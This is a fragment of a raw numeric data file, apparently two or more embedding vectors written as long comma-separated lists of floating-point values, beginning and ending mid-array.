-0.009484154,-0.010997906,0.06493229,-0.016348982,-0.019419048,0.0033837052,0.036571078,0.008170436,-0.0044077374,0.005349791,-0.019989867,0.0038656367,-0.0060376897,-0.040380754,0.013146908,0.0039721304,-0.008540537,-0.017468544,-0.01570782,-0.014278897,-0.010056941,-0.015308893,0.0023110914,0.008271576,0.023208478,-0.00398829,-0.011887822,-0.04778938,0.012371291,0.010861519,-0.020633493,0.0007373785,0.016718308,-0.008707671,-0.0268732,-0.013442563,-0.010604029,0.001721279,-0.018997222,0.010373475,0.025113696,-0.0008563636,0.03212408,0.00018980869,-0.008401649,0.00056289986,-0.0067452732,-0.01437523,0.010596368,0.012675574,-0.005347745,-0.0027238212,0.008677924,-0.00008032849,0.016059926,0.0092863245,-0.019718075,0.011452917,-0.0021877983,-0.0030535602,-0.005704441,-0.0005483836,0.00940848,-0.0101818275,-0.016091384,0.001194744,0.02077674,0.015916932,-0.0024240268,-0.0053639724,0.009045386,0.0017918001,-0.017831746,0.0020735827,0.0033766923,0.022447117,-0.0017594079,-0.015268897,0.021912117,0.0018349256,0.016177958,0.021455817,0.013396196,0.011292349,0.00009853393,-0.013295258,-0.002531209,0.020024592,-0.00015149334,0.0148993535,0.0030057149,0.007031492,0.038638536,-0.012941905,0.018978896,-0.0056940448,-0.012759172,0.005222228,-0.0018539807,-0.014095333,0.0067586116,-0.018401267,0.014443367,0.0085749235,-0.004460919,-0.00085165823,-0.029021695,0.009380104,-0.10898124,0.014743937,-0.038528353,-0.008528035,-0.014555707,-0.016800214,-0.0072227614,0.024410194,0.0018246464,-0.034283552,-0.007155194,0.007954602,0.0023010485,-0.011119481,0.0023445457,0.007923147,-0.011885262,0.008017561,0.012210695,0.0070711137,0.015245263,-0.004172069,0.014834171,0.0070987837,0.009471249,0.0014478066,-0.0016595959,0.021377059,0.017287219,0.013141397,-0.017889598,0.008407907,0.008261086,0.023841936,-0.0054976786,0.0024976812,-0.01753737,-0.0109903,0.009661705,0.021500321,-0.0009699038,-0.014538701,0.018432194,-0.0022520546,0.023659354,0.023318907,0.010006546,0.022974864,0.028351752,0.03345927,-0.02765884,-0.028155755,0.01139101,-0.004818899,-0.0011730395,-0.024721045,0.017494068,-0.0060214773,-0.0067291143,0.0033296384,-0.016241437,-0.012761581,0.003985946,-0.009933693,0.0037724576,0.008059085,-0.010772097,-0.016010378,-0.011740011,0.006646281,-0.008904492,0.008516753,0.00063120434,0.0011930948,0.009244353,0.013361166,0.027256051,-0.008106599,-0.017287597,0.00448631,-0.017700927,0.0032007995,0.020091668,0.01514361,0.015143514,-0.008185472,0.011188999,-0.008647943,-0.014726189,-0.0035805358,0.033902094,0.015738409,-0.012864465,-0.0010173508,-0.015305889,-0.0005476577,0.0018864488,0.023895046,-0.01102578,-0.016864503,-0.008659205,-0.0156239215,0.005139093,-0.022744201,-0.097737186,-0.018455299,0.009243404,-0.009355267,-0.020380003,-0.0008450685,0.022257881,0.0037071719,0.029097818,0.0080181,-0.01979975,-0.00008857096,-0.019715196,-0.005521217,-0.0050292527,-0.008374465,-0.023963107,-0.0060099144,0.016255543,0.0047106245,-0.0024282665,-0.00040405893,-0.008823799,0.004773591,0.009366377,0.021262458,-0.015408174,0.031937614,0.026908332,-0.015439048,0.005330778,0.010064398,-0.013568696,0.022249479,-0.042398557,0.0073950905,0.016280072,-0.0011066993,0.007154764,0.019115323,0.006947061,0.0063860724,0.018793922,0.0068675643,0.00019068056,-0.012744527,-0.013863264,0.016915327,-0.00489968,0.016758626,-0.010585764,0.001524243,-0.0008888805,-0.013645353,-0.017,-0.012881943,0.0088041,0.009680395,-0.0076499623,0.028233243,-0.008738284,-0.018518863,-0.016198216,0.028315427,-0.00046462438,0.021820566,0.0066307303,0.019194506,-0.005103071,0.013883855,0.015386743,0.02090173,-0.0014017819,-0.01549766,0.03319045,0.006270148,0.016902996,0.016588513,0.007957677,0.024722992,0.013295398,-0.026668632,-0.0051809913,0.013874402,-0.040919457,0.010214622,-0.00187867,0.02353919,-0.019621106,0.0021080803,0.016927715,0.022635156,-0.0069528986,0.029660352,0.021418067,0.031390626,0.042685214,-0.001165928,-0.0018166063,-0.006920589,-0.008638797,-0.012139414,0.00084459473,0.016824204,-0.016949296,0.0022945122,0.020247126,-0.012681363,0.007980305,-0.015991565,0.019264825,0.036118485,-0.021229643,0.007419125,0.008423827,0.018093083,0.0012198952,-0.0015698016,0.0070612985,-0.02106608,0.0024532722,0.016484834,0.0042078965,-0.022436434,-0.015953258,-0.006501369,-0.014229459,0.028386787,-0.010929363,-0.0089457575,-0.0010366199,-0.0025207952,0.021850614,-0.004303478,-0.016119521,0.004691234,-0.026578544,0.014797667,0.012971536,0.014262142,0.010596642,-0.002963425,-0.00044999624,0.008136571,0.0028236096,0.001626939,-0.0024756496,-0.020448633,-0.023567421,0.02118336,0.0095923515,-0.016196426,0.015192483,0.0025066927,-0.011130348,0.0047809496,-0.008030717,-0.0089223515,-0.004982315,0.016108846,-0.012859932,0.013108759,0.021311505,0.0042499616,-0.001503881,-0.001117293,-0.011631133,0.006480255,-0.0077185435,-0.006472255,0.001406056,-0.00869543,0.017889595,-0.06738489,-0.006009176,0.007380829,0.011900201,0.022123909,0.027070343,0.032683346,-0.024908612,0.00025596138,-0.007378822,-0.00050235435,0.009086591,0.012156311,0.0011841882,0.0046192487,-0.010557708,0.008132688,0.04405088,0.013137871,-0.0005699256,-0.027472712,0.016732138,-0.00866208,-0.0014906701,0.0010718205,0.010358668,-0.019356783,-0.011103828,0.012460851,0.007283913,-0.029392157,0.012599175,-0.006148364,0.0031742917,0.04622997,0.0003610491,-0.005880453,-0.01801622,0.028097602,-0.017043537,-0.010860331,0.010771548,0.040542986,-0.0035642707,-0.015904158,0.008349609,0.011735994,0.010104293,0.006126764,0.019968946,-0.0045040795,-0.011508462,0.03353712,0.027031235,0.025944844,-0.007419211,0.0070742685,0.011161956,0.020176424,-0.0376558,-0.0019807254,-0.003731134,0.0023615074,0.017462868,0.0036574681,0.005403493,0.003099259,0.016611055,-0.000081513615,0.036398903,0.013911596,0.022327479,0.0017969427,-0.013500789,0.0054011387,0.025631689,0.037175436,-0.0021992866,-0.0027109252,0.0020974309,-0.0070979884,0.021855028,-0.00918312,-0.008603642,0.014632476,-0.004117662,0.0067737885,0.00072848995,0.0024238299,-0.020071963,0.012818345,-0.0029324798,0.015708439,0.0009835316,-0.022818925,-0.0046675825,0.013189032,-0.004178696,0.00046956982,0.011050445,0.005084527,-0.020965803,-0.016275072,0.0055779666,-0.013654007,0.011208977,0.018511267,-0.0059659793,-0.017378831,-0.023476869,0.016660798,0.003843264,0.028282132,0.012444875,0.00982385,0.0132608935,0.0080750305,-0.008100758,-0.016663656,-0.012181605,-0.02580071,-0.0015217839,0.013737158,-0.0018333967,-0.007828319,0.0004166456,0.008528279,-0.0022911082,-0.021091392,-0.010269674,-0.006912669,0.0069888295,-0.015301218,-0.01114379,0.015636735,-0.0009198489,-0.011291369,0.0067533017,0.026485143,-0.024874097,0.027646106,-0.005975814,0.022851234,-0.0024242648,0.012826762,-0.01357908,0.0050304118,-0.008246071,0.006521138,0.020892808,-0.008644373,0.00656766,-0.005608782,0.0061026565,0.0317102,-0.003050164,-0.0019718774,0.02269108,0.018091341,-0.021922378,0.008161258,0.011935971,-0.007896984,0.017490257,0.032666527,-0.002863785,-0.0017459054,-0.005143572,0.012370819,0.01444692,-0.021319436,0.012567933,0.024425369,-0.004272045,0.008721341,-0.015476612,0.0088426005,0.0038232314,0.011511474,0.012446826,-0.0040809014,-0.027541824,0.03045723,-0.028935952,0.008459298,0.012208433,0.007964556,-0.013672135,0.018008431,-0.027294848,-0.016133396,0.008308497,-0.0011747365,-0.020054156,0.010902701,-0.011225546,0.017855113,0.005773317,0.0071343966,-0.02337838,-0.02647383,-0.0028482908,-0.10184674,-0.0024401185,0.013054447,0.009948745,0.047712673,-0.0015551992,-0.006598169,-0.0014234767,-0.002109072,0.020608323,-0.01255649,-0.018452577,-0.022427782,-0.009050132,0.036268074,-0.0026048867,-0.00079574407,0.008228925,0.016975073,-0.013058697,0.001857733,-0.012686586,-0.004148488,0.013378952,0.019370949,0.006359246,-0.001888579,-0.006882589,0.018137913,0.0068819094,0.009860891,0.00022605187,-0.0036722263,-0.011687986,-0.013463971,0.0033310275,-0.0047986535,0.0009344301,0.0045870543,-0.025750652,0.0034586543,-0.00043430852,0.005532479,0.009394315,-0.022547193,0.012351369,-0.015954018,0.004480067,-0.00540467,-0.02594414,0.0029050622,0.0058792923,0.0004656197,0.019146647,-0.0026855194,0.0091695255,0.022014016,-0.009717476,0.03457614,0.0023119864,-0.009231197,0.0128021445,-0.0005110851,-0.004984902,0.007637086,0.007580923,-0.010145849,0.011324687,-0.010857133,-0.0007427966,0.014042212,-0.02757769,0.0097920345,-0.023055023,-0.003782374,0.016042208,0.014348025,-0.0045986194,-0.024481792,-0.00600179,0.05034798,-0.017085413,0.022686444,0.0045829457,-0.009454631,0.0041170917,-0.0017886955,0.0048115435,0.008895475,-0.016205208,-0.008386653,0.0045018382,0.010891509,-0.0058214115,0.016980695,0.0031528312,-0.008195775,0.009652985,-0.0081157535,0.006278619,-0.021580866,0.010092205,-0.0106867,-0.009250731,0.00049747573,-0.0034554391,-0.021563267,-0.009721389,-0.0011959494,-0.004798982,-0.020797133,0.05228252,0.037554525,0.017235097,0.012311063,0.015496617,0.0015465639,0.009275083,-0.012915915,-0.017384812,-0.011742939,0.008368507,-0.013822013,0.025838299,0.019478729,0.0022952144,0.009339919,-0.007353431,-0.01405064,0.0026758502,0.012439105,0.015714303,0.0048428597,0.0057043056,-0.024624642,0.010030882,-0.0075750453,0.023692107,0.012396457,0.013027731,0.0053616716,-0.0124598965,-0.0042930716,-0.0013541847,-0.011304164,0.018495027,0.012618606,-0.012149674,0.008498557,-0.024256881,-0.016827537,0.004081017,-0.0059796404,0.0037844474,-0.023890626,0.009561241,-0.0009154165,0.022337487,-0.0024290339,-0.014494077,-0.003395606,0.021887831,0.008423374,-0.008309147,-0.022032514,0.0038781473,0.007841269,-0.0065465835,-0.017848216,0.017129345,-0.034527972,-0.01293111,0.009607596,-0.010351244,-0.015792279,0.010052008,0.026176972,0.020059781,-0.006674803,-0.0031332555,-0.029318588,-0.0020802727,-0.00021498477,-0.01173258,-0.0032572045,-0.002657586,0.013302443,0.0022696333,0.009246063,-0.006318064,-0.0024696547,-0.021522153,-0.0073707844,0.005010721,-0.0050687185,-0.0047805966,0.009516576,-0.01773182,-0.0117796,0.020921683,0.0066962466,0.027174663,-0.01990946,0.015089363,0.028711727,0.016336529,-0.026563205,0.017253278,-0.016708408,-0.005617326,-0.0005693151,0.00070306857,0.029413939,0.12717515,0.0043508275,0.005918877,0.006569069,0.010411244,0.0034785594,-0.0070769237,-0.02620426,-0.0021417094,0.007095825,0.029364914,-0.008925437,0.014724844,-0.018110992,-0.011802328,0.026938844,0.023894314,-0.026904745,0.019092372,0.012913237,0.020817481,-0.014407192,0.0039445492,-0.06276201,-0.009241557,-0.07295,0.033647478,0.02136776,0.0038390106,0.036478218,0.016703865,0.016166937,0.035752077,0.020039136,-0.020122694,0.006887053,-0.0038206698,-0.012361956,0.0010861227,-0.0109595945,0.03126026,0.019337932,0.011445965,-0.009511528,0.004041594,-0.0109954765,-0.0073772916,-0.008484957,0.018110873,0.0018245563,0.00025516114,0.0008964958,-0.0024024837,-0.0014687235,0.019884864,-0.011755112,0.0056597544,-0.0025353823,0.028210225,-0.005450549,0.014852437,0.009804428,0.0042393375,-0.012711037,0.00891383,-0.00006550602,0.012737346,-0.007933262,0.0068150214,-0.003532765,0.009839098,0.008705894,-0.008203463,-0.0004434612,0.0045532766,0.009275541,-0.012061937,-0.0101382965,0.005980472,-0.012103496,0.0032257093,-0.0029566402,0.009701529,0.010610348,-0.0006384263,-0.0053908085,-0.010917361,0.021972215,0.00050261937,-0.012387723,-0.005460071,0.015822152,0.01839781,0.021208238,-0.007326326,-0.00021548325,0.00604653,0.00090487994,-0.006617947,0.003505374,-0.0067054364,-0.019866845,0.002368944,0.008176479,0.0006776611,-0.019102689,-0.013256364,0.026039213,-0.0025466823,0.005421853,-0.016170556,-0.0015529939,0.0003264076,0.008201161,0.007841579,0.039373748,-0.029565006,-0.022805955,0.01755693,-0.0142907025,-0.00004818543,0.000070022994,0.011835455,0.040983535,0.021381715,0.011447413,-0.02479608,-0.000045748242,-0.0163561,-0.0018058462,0.012481488,-0.028142953,0.0037073912,0.01748976,-0.0039348886,0.024764327,0.035654932,-0.021661641,-0.005355548,0.0039984593,0.010530009,-0.008559419,-0.0036024922,0.014718273,0.011002733,-0.013771787,0.015698217,0.011135346,0.0016953783,-0.00040457645,-0.0017159133,0.024642052,0.0005246393,-0.017030118,-0.01597892,-0.02223139,-0.0068211094,0.0036026253,-0.014038497,-0.016154816,0.022503978,-0.0053167217,0.011961536,-0.03073691,-0.009434135,0.01770006,0.025755996,0.011599214,0.0030108113,0.032271303,-0.021870457,0.0103595955,0.017743222,0.00797111,-0.02325461,0.0016286084,0.022065785,0.02147877,-0.0064241686,0.0073753833,-0.0053515127,0.029882468,0.0009548547,0.008692558,0.0052339523,-0.0035701864,0.020636005,0.0118321115,-0.026728565,0.009481953,-0.002214774,-0.013374367,-0.00442514,0.00029972187,0.00939577,0.020269025,-0.022090603,0.01783346,-0.036604725,-0.0333415,0.0009517423,-0.0041084224,0.017642286,-0.018140333,-0.006386506,0.0053073918,-0.0009802462,-0.004091366,0.011639477,-0.02490138,0.0095153535,-0.002122358,0.008087352,-0.027813254,-0.0028309578,-0.005032791,0.0007908069,-0.01646986,-0.019208604,-0.016466798,-0.0020658113,-0.0057720994,-0.009488845,0.0007266895,-0.010208273,-0.0074472013,-0.021014078,0.020767134,0.017248647,-0.043746036,-0.010611369,-0.0089035025,-0.015469053,-0.006263873,-0.009460998,-0.02189909,0.020755412,0.01394202,0.02085687,0.009660677,0.012691716,0.01083868,-0.0034400444,0.0028457958,-0.018246425,0.019456046,0.0038254228,-0.0021167158,-0.002649888,-0.0047843675,-0.01631866,0.006856648,-0.030577756,0.0043230276,-0.002136138,-0.0037326785,-0.0020254387,0.029849904,0.033001605,-0.015723532,0.029327895,0.03164203,-0.0080324095,0.029938519,-0.010932105,-0.008733589,0.0070979185,-0.0009580476,-0.010715602,-0.0034951689,-0.0037669921,0.02072314,-0.012139454,0.015054307,-0.0072879335,0.0032637918,-0.0072733606,0.002561762,-0.0044647697,0.009984725,-0.001623545,-0.020019395,0.0033929953,0.0012062672,-0.005477007,-0.0059827687,0.010992427,-0.0022124855,0.066641174,-0.052739184,-0.002179346,0.0080789765,-0.011345712,-0.015953366,0.021397337,0.002359235,-0.031933893,-0.026258595,0.018367657,-0.018628443,-0.0023441517,-0.031695496,-0.01277969,-0.010835526,-0.024454193,0.004616842,0.009100261,-0.010658933,-0.007640619,0.013541149,-0.0025233084,-0.0035067913,-0.011362427,0.0023419017,-0.01726183,-0.009109959,-0.00057117664,-0.004395451,0.016886346,0.012817247,0.01148363,-0.034474276,-0.00064604,0.015817866,0.00276692,0.010387931,0.0018550195,-0.032158963,-0.021527885,-0.017254995,0.0042846007,-0.008764586,-0.008582861,-0.027319571,-0.012571567,0.012633218,0.0018931765,0.1467915,-0.024450943,-0.0008675414,-0.0121968025,0.00015265612,-0.011715723,0.018129792,0.022486582,0.004376903,0.031469394,0.002535817,-0.0019933125,0.0035585174,0.0071972976,-0.00103992,-0.00055075326,0.006470402,0.17892079,0.004009949,0.022016676,-0.00473881,-0.008947194,0.0017743716,-0.003366652,-0.0032566725,-0.08232726,-0.02217361,-0.013988103,0.0024131988,0.0066007003,-0.038441736,0.036701713,-0.0009946156,-0.0000774387,0.0010956634,0.002536837,0.015799886,0.0016324815,-0.016423235,0.0036126613,0.009215707,-0.005013083,-0.0012595663,-0.012985741,-0.003198228,0.013162572,-0.02274751,-0.0064751846,-0.009033566,0.03818984,0.013798858,-0.018555997,0.0014093128,0.013407209,0.013938257,0.008584034,0.00992797,-0.010223847,-0.02376175,0.01704633,-0.010227264,0.026994864,-0.02032737,0.034580424,0.002239649,-0.006690447,-0.023992276,0.0043689013,0.00444355,0.024899729,-0.001742448,-0.013041351,-0.018202793,-0.0016307903,0.05079267,0.013179496,-0.018596856,-0.0019507571,0.01614963,-0.0022538512,0.017788615,-0.0066430746,-0.023040488,0.006936931,0.008724962,-0.0001340773,-0.011620186,0.0050915815,0.0046238312,-0.0044382103,-0.024204275,0.004147369,0.005137963,-0.0031592064,0.0019413119,0.017387817,0.006640529,-0.00459844,0.0063248035,-0.0076258658,0.008304954,0.025137927,-0.009093509,-0.003579169,0.0037204188,0.015342601,-0.030860836,-0.033885363,0.017575061,0.012144253,0.0025707767,-0.0033684708,0.0016702898,0.011460964,0.0019590503,-0.0026245806,-0.011996011,-0.003172906,-0.044831038,0.0072149616,0.0021277235,-0.013727396,0.0072085066,0.011260975,-0.016980596,0.012980746,0.02906269,0.009285671,-0.007159204,0.0036794406,-0.014696868,-0.0034382138,-0.017344655,0.055126853,-0.010758112,-0.014747151,0.0014147429,-0.043964524,-0.016116228,-0.0013800487,0.012756946,-0.00040335165,0.016067615,-0.008212451,-0.011965525,-0.020314869,0.018264813,-0.0071580415],[-0.011736338,0.012800017,-0.023344852,-0.014322295,0.015698345,-0.040414423,-0.0063195257,0.010069597,-0.009188713,-0.007954507,-0.00615891,0.0011236544,-0.005547738,-0.0013791799,-0.01810522,0.022457853,-0.012076349,-0.0062620193,-0.003537841,-0.011943689,0.0057148268,0.0021806862,0.002108126,0.019130832,-0.004583767,0.0034294326,-0.022047991,0.006092096,0.008912673,-0.0052676736,-0.00011079421,0.014819575,-0.00211972,-0.0068692383,0.002555678,-0.009252526,-0.018921098,-0.0146514205,0.018302644,-0.019295588,0.0059868065,0.022098914,0.006055347,0.034340717,0.01811783,-0.0013627737,-0.0072557866,0.0030557632,-0.007333252,0.017291961,0.011810717,0.010678051,-0.033369016,0.013793786,-0.024390826,-0.0068331873,0.0069623548,-0.017345719,0.027043425,0.006098638,-0.019142535,0.015270521,0.014131094,-0.028635254,0.01076949,-0.012595915,0.0064978204,-0.038886886,0.029798588,-0.0036232495,-0.011747107,0.009539298,0.0021496154,0.01471773,-0.021837423,0.0095339725,0.0013230614,0.012170365,-0.018127616,0.0033206823,-0.028545167,-0.0064424295,0.00019499121,-0.013230703,0.0009768188,0.010804021,-0.0017797494,0.013902127,-0.010353001,-0.022402678,-0.0054535684,0.009498319,0.009376734,-0.023820285,0.008839538,0.011575659,0.010770709,-0.0042971172,0.005790216,0.017015956,-0.003504848,-0.017308226,-0.021614127,0.00035886583,0.0070391158,-0.009889027,-0.01765626,-0.006664516,0.0113298185,0.0023739948,0.015362409,0.00027945923,0.0016028035,0.025060117,0.003993145,0.004396639,-0.0013955567,-0.0010591105,-0.011350126,-0.013885906,0.009259932,0.0055559035,0.00582567,-0.0027411592,-0.023589037,0.0032829163,-0.028608177,0.00003442131,-0.0060182363,0.020875903,0.0015551202,-0.0010643852,-0.022895021,-0.020018129,0.0067848335,0.0033721272,-0.0070665157,0.008804812,0.017845498,0.007994995,0.0051723984,-0.015418545,-0.0015656839,0.021160536,0.012816456,0.012464631,-0.0018142727,0.0030972764,0.02400572,-0.0075120623,0.016214598,-0.001446777,0.011470238,-0.018894447,-0.0023021714,0.024929008,-0.0012975441,-0.02384581,-0.001961562,0.035364866,-0.013833853,-0.011283222,0.0020131238,-0.005024175,0.017499685,-0.033397153,0.0040880637,-0.00680952,-0.018339299,-0.026393645,0.009462714,0.016119706,0.010229912,-0.0066528274,0.0026586957,0.0029711598,-0.0070078834,0.0022588032,0.008816662,-0.0042375396,0.016742524,-0.015783785,-0.020853177,0.001622421,-0.017076174,0.025514767,0.030643577,-0.009630654,-0.011598675,-0.014658872,0.012877538,-0.02322616,-0.004671777,-0.016412048,-0.020061662,-0.02225131,0.0038763245,0.072080776,-0.007300546,0.016583057,-0.0009272761,-0.014026969,0.004850509,-0.03589288,-0.009989653,0.005920151,0.0039584027,-0.026068144,0.02250406,-0.016876286,-0.027643463,-0.009340006,-0.01379678,0.009159654,0.00003949452,-0.037153944,0.025822531,0.01103559,0.012213843,0.00025047568,-0.000925253,-0.0020175832,-0.008671649,-0.028588247,-0.00012782193,-0.010177341,-0.01404814,-0.0031312557,0.023733262,0.00062931154,0.014952398,0.00007616558,0.0035601978,-0.016523419,0.025324723,-0.014053168,-0.0055060545,0.000697359,-0.012965191,-0.020434044,-0.006188035,0.0117012635,0.0072291214,0.030073686,-0.022831907,-0.020721937,0.01614522,-0.00383104,0.008219166,0.014669619,-0.013614375,-0.011545036,-0.0004920321,0.015440254,-0.017154824,-0.040413354,0.010664983,-0.01898638,-0.014152313,-0.00784981,0.020970603,0.027627433,-0.00494375,0.010015566,0.029723475,-0.008319314,0.00076421443,-0.03468465,-0.010994342,-0.019517792,-0.004727836,0.033123687,0.005264484,0.0074855187,-0.004594077,-0.011868785,0.022250999,0.017173173,-0.007224001,0.0052690166,-0.005801704,-0.014854654,0.011708026,-0.001115955,0.0016351722,0.015314729,-0.0021939115,0.0006271016,0.01929219,-0.018413708,0.0053134137,-0.00898357,0.031190565,0.013141155,-0.02098834,0.012093867,-0.014946557,0.0054971385,0.013050657,-0.028836498,0.011091747,-0.0030444525,0.0064472686,-0.00911296,-0.0049687345,0.007352865,-0.02073284,0.036362447,-0.022642106,0.030402461,-0.041994713,0.008213662,-0.022937367,-0.0039610276,0.022020461,0.029168222,-0.020093938,-0.0060836202,-0.015143011,-0.001751224,0.00872531,-0.023912918,0.020372737,-0.009251453,-0.013159558,0.0008430838,-0.020542968,-0.029098723,0.0038767094,0.019604236,0.016478047,0.026040971,0.0075940457,0.012496349,-0.014471645,0.009106268,-0.0075725,0.0103671225,-0.010776293,0.0022798984,-0.017538879,-0.0030966154,-0.0062887226,0.014776571,0.011974294,-0.017104506,0.021582926,0.00062023953,0.004981272,0.007732585,0.025354398,-0.009967145,0.0056680394,-0.0075385226,-0.025557466,-0.0036301923,0.0020642297,-0.0044114334,0.023782939,-0.0009028467,-0.0015505654,0.01343003,-0.027302487,0.000716659,0.07298756,-0.011096374,0.0007988256,0.007501915,-0.014268065,-0.0011440435,0.017057091,0.00018831472,-0.004035878,-0.021609614,0.0067451503,0.0057920683,-0.0056941486,0.016737588,-0.016804203,0.011903577,-0.035594154,-0.021506619,-0.032980774,-0.0034262831,0.025161225,-0.014459518,0.0041243737,0.017202832,0.027305312,0.004660199,0.027828772,-0.0006724206,0.028321197,-0.018476417,0.012347266,0.0124139385,0.025936097,0.012129223,-0.037495896,0.017390247,0.019081634,0.005021839,-0.01173607,-0.0047121197,0.0013239946,0.008643926,-0.0055968277,-0.028574944,-0.012702528,0.033387497,-0.0017523305,-0.013935734,-0.02685645,0.029860469,0.025509385,0.016919969,-0.0055162203,0.003648463,-0.00061777123,0.0016189442,0.02087089,-0.031711705,0.0455112,0.02172884,0.026063709,0.010424746,0.0012703539,-0.022103274,0.0074172774,0.029180551,-0.014949976,-0.019071005,0.01915073,0.0019269335,-0.0023583265,0.008300576,-0.0071603972,0.025022997,-0.011173676,0.015021803,-0.011833702,-0.008382795,0.009753065,0.03496679,-0.029794812,-0.0021403518,0.017589122,0.015986115,-0.010652245,0.018913258,-0.006310699,-0.0016102964,0.01301533,0.011120502,-0.000895318,0.009455877,0.009475405,0.0110639995,0.0141305225,0.02308537,0.013013236,-0.0015590019,-0.0063018943,0.014090139,-0.0023212105,-0.027113734,-0.009999915,0.0066281506,-0.0048891813,0.008461368,0.0033494793,-0.010956878,0.008335594,0.042180035,-0.021481318,0.018890556,0.0057831095,-0.03272349,-0.0027629589,-0.021421116,0.0016789708,-0.016538495,-0.013449633,0.011445209,0.020548644,-0.003739468,0.0012956839,0.008266303,-0.0039869347,-0.0057502864,0.0042030765,-0.047142543,0.0250511,0.017933702,-0.001493793,0.014837942,0.0008870831,-0.02916388,0.030336563,-0.0014068019,-0.0131408,-0.028452681,0.034010496,0.033582345,0.012673882,0.019985277,0.0043062964,-0.0004896844,-0.0074863248,0.023130551,0.021981813,-0.012375243,-0.027798632,0.004726198,0.0023962017,0.000791272,-0.007607675,-0.009812152,-0.010022396,0.0009384242,0.024130348,-0.015370491,-0.00077296223,0.0033709907,0.027312452,-0.024799703,-0.008874998,0.002064059,-0.008752631,0.036320508,-0.020797461,0.02841638,-0.011637711,-0.030980391,0.004709674,0.018931441,-0.009431056,0.013040278,-0.0057394444,-0.014270595,-0.007351795,-0.0034928464,0.0072894036,-0.012847991,0.012055928,-0.03248972,-0.00816044,-0.0016473744,0.0077805324,-0.0020074835,0.011414185,-0.024165008,-0.01723062,-0.0040184185,-0.026324341,-0.021375356,0.03498178,0.01923249,-0.02246213,-0.02656884,-0.016379405,0.0060335123,-0.006071011,0.021413622,-0.008397394,0.005142425,0.0025529217,0.0026691328,-0.022269636,-0.001922569,0.028298652,0.005461073,0.018582081,0.015976558,0.0060366164,0.04131496,0.005035074,0.008175815,0.0042468114,0.030133355,-0.017287472,-0.009756958,0.028577304,0.026582409,0.007279588,-0.02002903,0.00448611,-0.011887604,-0.0012801223,-0.025074314,0.017961139,0.0050373585,0.0026062934,-0.022216683,-0.015320574,-0.025202043,-0.010603152,0.008626694,-0.0029329357,0.0009423422,-0.032987386,-0.005455322,-0.000027369895,0.004710886,-0.017595433,0.015350104,0.016554238,-0.0024348353,0.018940764,0.025664633,-0.017632434,-0.0038060804,0.010494483,-0.016153174,0.008126883,0.018366829,0.012752286,-0.0065812175,0.006918791,0.010739142,0.005022611,-0.0116826985,-0.012499124,0.012255537,0.013686941,-0.0047100047,-0.009436296,0.0013316846,-0.03245244,0.007012417,0.008938103,-0.041958023,-0.011463269,-0.008249272,0.016508596,-0.01363402,-0.010230269,0.02549545,-0.00439174,-0.0014188591,-0.012820589,0.046603862,-0.038073346,0.014646795,-0.00555803,0.0021740482,0.0033253073,0.045388885,-0.00012278707,0.029855214,0.012172726,0.0019248583,-0.011023414,-0.013060444,-0.0138298115,0.001750666,0.0043388363,-0.0033698406,-0.034068864,-0.018423729,-0.019811157,-0.058245055,-0.019817153,0.022810489,0.022565676,0.01210023,0.0065570446,-0.015052089,0.014752274,-0.03867956,-0.009166773,-0.033459257,-0.0032222837,0.0040436834,-0.028078511,0.024236307,0.009431982,-0.014077436,0.0011298634,-0.0101844445,0.006280576,0.0115141105,0.010318588,-0.012094484,0.016507102,0.011213922,-0.009722749,0.033002917,0.0012097553,-0.0050336607,0.010388055,0.009457456,0.0142871225,-0.0069651343,-0.0005363981,0.011976267,-0.015714122,0.0038044096,0.004906322,0.029450374,0.010858921,0.017853219,-0.0039903633,0.012269321,-0.006962284,-0.017271377,0.0032209326,0.03526843,0.0088979155,0.009347003,0.020272974,-0.017796028,0.036635626,0.0022163913,-0.022355102,-0.021679394,0.018585278,0.014144186,0.013246254,0.024009366,-0.0025085781,0.017840574,-0.0012888199,-0.015720164,-0.0004354965,0.020298585,0.011905245,0.036818884,-0.005176215,-0.004589119,0.011638761,-0.015168776,-0.011730354,-0.0054590534,-0.013430109,-0.043992992,0.027222196,-0.021551315,0.017590078,-0.044264026,0.0042952388,0.013192707,0.028331643,0.0015234075,-0.008395335,0.0020862897,0.0058413954,0.006521037,-0.024593845,-0.03793959,-0.0017530676,0.020733565,-0.024678478,0.021723155,0.01583928,0.010150092,-0.017430427,0.018639421,-0.0045531676,-0.013388743,-0.011609708,-0.018892014,0.010817787,-0.0006905708,0.020717615,0.006008593,0.016163124,0.008382258,-0.022004899,-0.012504035,0.00022074084,-0.020883214,0.021955911,0.011556635,0.0026185762,0.01036738,-0.01181254,-0.031369008,0.006717052,-0.031816173,-0.010446216,-0.0029207068,0.0052827373,-0.011344094,0.013710801,-0.010734453,0.02921335,0.024136186,-0.015887331,-0.0051122773,-0.0030957726,0.0111637805,0.025524374,0.031208903,0.0188515,-0.05319108,0.0109345205,0.025168413,0.0025773947,0.01528695,-0.03369558,-0.024731696,-0.035829578,-0.044996347,0.012296618,-0.026583416,0.013440713,-0.002810611,-0.031227397,0.022185275,-0.028440213,0.026068233,-0.0045329044,0.012527802,-0.0035842482,-0.021667132,0.002039905,-0.035103817,-0.030547185,-0.0063229636,-0.035247706,-0.00048862974,0.0041666185,-0.032256477,0.0038983934,-0.03190991,0.004918644,-0.021256406,0.024674749,0.008227854,-0.02665646,0.022340115,0.017108463,0.014078319,0.01848855,-0.005862819,-0.019961512,0.023720305,0.018865755,0.015460941,0.01334254,0.0009342447,0.035735037,0.006492748,-0.015404154,0.023312598,-0.005190428,0.014253412,-0.013701366,0.012057233,-0.025790326,-0.009717666,0.024445139,-0.011188777,0.011217118,0.018043753,0.008251316,-0.022320868,-0.020751175,-0.01531287,-0.023777287,-0.020326287,0.020749854,-0.01931961,0.000041876276,-0.00013353578,-0.030597016,-0.006707951,-0.0024051752,0.02123541,0.0013957098,0.00510381,0.02992719,0.0010073917,-0.019005511,-0.011324474,0.014284986,0.0023924345,0.022100309,0.016083356,-0.014995207,0.036263995,0.021766922,-0.02232076,-0.003399521,0.013435004,0.0036208187,0.005498084,0.0132103665,0.018392744,-0.0010906936,0.0052109947,0.027919887,-0.020961503,-0.0051258155,-0.015603674,0.010976242,0.0043358807,-0.044375993,-0.0026399796,-0.00898975,-0.0029621376,0.024773885,-0.023976704,0.000044388165,-0.008557524,-0.0018829893,-0.00723542,0.0047064237,0.029996248,0.010008855,-0.010356115,-0.0120634595,0.019496765,-0.016771125,0.011933002,-0.023762723,-0.009447145,0.016493235,-0.00009602419,-0.005972336,0.022207225,-0.029828494,-0.008891077,0.040476836,-0.010374728,0.012031504,-0.029625462,-0.008127017,-0.0017531372,-0.017505676,-0.025022386,-0.00